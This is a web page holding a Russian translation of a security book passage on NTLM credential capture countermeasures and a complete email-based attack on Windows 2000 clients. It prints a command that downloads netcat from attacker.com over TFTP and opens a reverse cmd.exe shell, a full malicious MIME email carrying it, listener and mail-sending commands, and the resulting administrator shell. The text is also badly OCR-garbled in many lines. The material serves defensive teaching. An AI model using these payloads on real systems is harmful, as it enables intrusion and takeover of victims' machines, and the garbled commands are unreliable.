На главную | Содержание | Назад | Вперёд
Наши друзья

 

 

Меры противодействия перехвату NTLM-данных



Бюллетень
MS00-067


BID
1683

Исправлено в SP
2


Фиксируется
Нет

Для наилучшей защиты сети исходящие соединения по протоколу NTLM должны блокироваться на внешнем брандмауэре. Однако в результате данной атаки данные аутентификации NTLM передаются по протоколу telnet, поэтому на брандмауэре должны блокироваться также и исходящие соединения по протоколу telnet.
На уровне узла Windows клиент telnet должен быть настроен таким образом, чтобы не использовать аутентификацию по протоколу NTLM. Для этого необходимо запустить программу telnet, ввести команду unset ntlm и выйти из программы, чтобы выполненные изменения были записаны в реестр. Компания Microsoft также представила в бюллетене MS00-O67 заплату, после установки которой система выдает пользователю предупреждающее сообщение при попытке передачи аутентификационных данных по протоколу NTLM серверу, с которым не установлены доверительные отношения. Набор параметров реестра хранится в разделе реестра HKCU\Sof tware\Microsof tXTelnet, а для параметров должны быть установлены следующие значения.
▼ "ЫТЬМ" -dword: 00000000 — Disabled (Отключен) A. °NTLM"=dword: 0000D001 — Enabled (Включен)
Здесь также нужно отметить, что настройка уровня аутентификации службы LAN Manager в политике безопасности может значительно усложнить хакеру задачу перехвата аутентификационных NTLM-данных пользователя, как было описано в главе 5., "Атака на службы Windows". Установка уровня аутентификации в значение "Send NTLMv2 Response only" (Отправлять только NTLM-ответ) или более жесткое ограничение, снижает риск атак перехвата данных LM/NTLM (предполагается, что так и не появится программ для извлечения хеш-кода из данных "запроса-ответа" по протоколу NTLMv2). Сохраняют свою опасность атаки с помощью подложного сервера
и атаки посредника по протоколу NTLMv2, при условии что сервер может нормально установить связь С клиентом по этому протоколу.
НА ЗАМЕТКУ
Вечная проблема безопасности в клиентских программах от компании Microsoft состоит в том, что добавление URL-адреса в виде file: // имя_сервера/ресурс на странице Web-сайта или в сообщении электронной почты а формате HTML приводит к созданию сеанса связи SMB с сервером имя_сервера, при этом возможна передача злоумышленникам данных аутентификации LM/NTLM и открытие клиентской системы для контролируемого хакером сервера SMB или атак посредника. Такие атаки описаны в главе 5, "Атака на службы Windows".
Все компоненты в сборе:
полная атака клиента
В этой главе были описаны самые разные атаки, во многих из них для запуска вредоносного кода на клиентских компьютерах, которые находятся на периферии организации, используются незаметные недостатки программного обеспечения. Нужно ли тратить время на рассмотрение таких незначительных атак против малоценных клиентских систем среди всех остальных серьезных вопросов безопасности серверов, которые описаны в этой книге? Кроме того, многие из подобных проблем имеют в основе ошибки программного обеспечения компании Microsoft, которые уже исправлены. Так не лучше ли заняться чтением соответствующих статей и установкой заплат вместо того, чтобы сидеть и размышлять над такими глобальными вопросами?
Надеемся, что если вы дочитали главу до этого места, то уверенно ответили на предыдущие вопросы "нет". Лишний раз подтвердить это помогут истории из опыта консультаций авторов книги — одновременное использование нескольких незначительных ошибок позволяет взломать всю сеть. Рассмотренный ниже сценарий предполагает, что злоумышленник стремится получить удаленный контроль над системой внутри сети организации (за брандмауэром), ему известен адрес электронной почты администратора системы, администратор работает на системе под управлением Windows 2000, на которой не установлены пакеты обновлений и исправления. Для чтения электронной почты администратор использует программу Outlook Express в конфигурации по умолчанию (чтение почты происходит в зоне Interner). Брандмауэр организации разрешает исходящие соединения по протоколам TFTP (TCP/UDP-порт 69) и HTTP (ТСР-порт 80).
Ниже показан набор команд, которые загружают на систему администратора по протоколу TFTP программу netcat и запускают ее в целях получения командной строки по протоколу HTTP (получение доступа к командному интерпретатору с помощью программы netcat описано в главе 7, "Переход к интерактивному режиму работы").
start /В tftp -i attacker.com get пс.ехе С:\winnc\system32\nc.exe* Ч> &£ start /В nc -d -е cmd.exe attacker.com 80
Нужно отметить, что эти команды в Windows 2000 выполняются незаметно, пользователь, который находится за консолью, почти не заметит никаких проявлений их работы (исключение возможно, если на панели задач отображается пиктограмма сетевого соединения, также об активности системы может сообщить индикатор работы жесткого диска).
Хакер получает доступ к командному интерпретатору, отправив по электронной почте вредоносное письмо, составленное в соответствии с описанием исполняемых вложений
MIME Хуана Карлоса Гарсии Куарта!
iro (Juan Carlos Garcia Cuartango;
i. Рас смотр]
im это вредоносное письмо (назовем файл cmd.
:xt).

истинг 13.3. Вредоносное письм-
hslo soir.edomain. com
mail from: <mallory@malweary.сош>
rcpt to: <hapiessSvictim.com>
data
subject: Disregard
ЩМЕ -VorS.ion: 1. 0
Content-Type: multipart/related;
type-"multipart/alternative1
boundary="l° X-Priority: 3 X-KSKail-Priority: Normal X-Unsent: 1

-
Content-Type: multipart/alternative;
boundary^■2"
--2
Content-Type: text/htral;
* charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
<HTMb> ■EHEAD> ■:/HEAD>
<BODY bgColor=3D#fff£ff> tiframe src=3Dcid:THE-CID height=3D0 widtn=3D0x/ifranie> This message uses a character set that, is not supported by the Internet Service. Please disregard.<BE> </BGDY> </HTML>
--2 —
~1
Content-Type; audio/x-wav;
nair.e="rnc.bat" Content-Transfer-Encoding: quoted-printable Content-ID: <THE-CID>
-
start /В tftp -i attacker.com get nc.exe C:\winnt\system32\nc.exe ££ start /В nc -d -e cmd.exe attacker.com 80

— 1
quit


Как видите, хакер вместо безобидного "Hello World" вставил команды для получения удаленной командной строки. Как видно из программы, вовремя предварительного просмотра сообщения в программе Outlook Express будет инициирован сеанс связи с системой хакера, загружена программа netcat, и системе хакера будет передан доступ к командной строке взломанного хоста. Привилегии сеанса работы с командной строкой, которые получит хакер, будут соответствовать привилегиям пользователя, который прочитал сообщение и таким образом запустил последовательность команд.
Итак, хакер должен создать базу для атаки и отправить сообщение. На системе злоумышленника выполняются следующие действия.
1. Запускается сервер TFTP с файлом пс. ехе в каталоге для передачи (мы рекомендуем использовать программу TFTPD32, бесплатный пакет TFTPD от Филиппа Джоунина (Philippe Jounin)).
2. Запускается программа netcat, которая ожидает подключения на заданном порту (чтобы обойти типичные ограничения брандмауэров, в примере использован ТСР-порт 80, хотя если удалось открыть соединение TFTP на первом этапе атаки, то можно с большой уверенностью сказать, что на атакуемом узле не установлены жесткие ограничения доступа).
C:\>nc -w -1 -р 2002 listening on [any] 2002 ...
3. Когда подготовка проведена, постороннему серверу электронной почты можно передать сообщение для доставки по адресу hapless@vic tim. com:
C:\>fcype cmd.txt | no -w rogue.mail.server 25
Несчастный пользователь на своем компьютере запустит программу Outlook Express и проверит почту. Наше сообщение окажется в начале очереди и запустит вложенный код, как только включится предварительный просмотр. Почти все при этом будет выглядеть как обычно, только на очень короткое время мелькнет диалог загрузки файла и окно командной строки (все это происходит меньше чем за секунду).
На 2 показано окно программы Outlook Express при проведении этой атаки. Вредоносный код содержится в сообщении от отправителя SIZE=1120 (манипуляция заголовками MIME всегда дает такой результат — сообщения выглядят как отправленные от пользователя SIZE=XXXX, где символами X обозначены цифры от 0 до 9).
Ниже показана копия окна программы TFTPD32 на сервере хакера после выполнения на атакуемой системе программы, которая была вложена в письмо. Из содержимого окна видно, что программа netcat была успешно загружена на атакуемую систему.
Comedian receded Frwi 132.lS8.23i.2iO onоо-ИSIS Read lequesl For J>? (гк.еиех Mode осе" <nc.M>: lent! 18 bfci. 59332 bjisiii 0 s. 0 FA resenl
J Jj
.CuawtArtoi . |LBesBtvonpat6S .
И наконец, проверив установленную ранее службу, которая ожидала подключения от клиента, мы обнаруживаем, что командный интерпретатор удаленной системы был успешно предоставлен через ТСР-порт 80 этой атакуемой системы несмотря на работу брандмауэра. В данном случае полученная командная строка — это полное разорение для владельца атакуемой системы. Пользователь читал почту от имени администратора, и командный интерпретатор унаследовал вес административные привилегии (это лишний раз доказывает утилита whoami из пакета Reskit). Посмотрим, какие диски смонтированы в системе.
С:\>пс -w -1 -р 2002 listening on [any] 2002
connect to [192.168.234.250J from MGMGRAMD Microsoft Windows 2000 [Versipn 5.00.2195] (C) Copyright 1965-1999 Microsoft Corp.
C:\Documents and Settings\Administrator>
C: VDocuments and 5ettings\Administrator>whoanil
whoami .
MGMGRAND\Administrator
C:\Documents and Settings\Administrator>net use net use
New connections will not be remembered.
192.168.234.240] 1221
Status
Local
Remote
Network
OK F: \\payroll\e$
Disconnected G: \\corp-dc\admin
The command completed successfully.
Microsoft windows Network Microsoft Windows Network
Был получен удаленный контроль над системой с правами администратора практически полностью благодаря одному письму электронной почты. Злоумышленник, скорее всего, перейдет затем к изучению внутренней сети и, вероятно, остановит свой выбор на сервере под названием Payroll.

 

На главную | Содержание | Назад | Вперёд
 
Яндекс.Метрика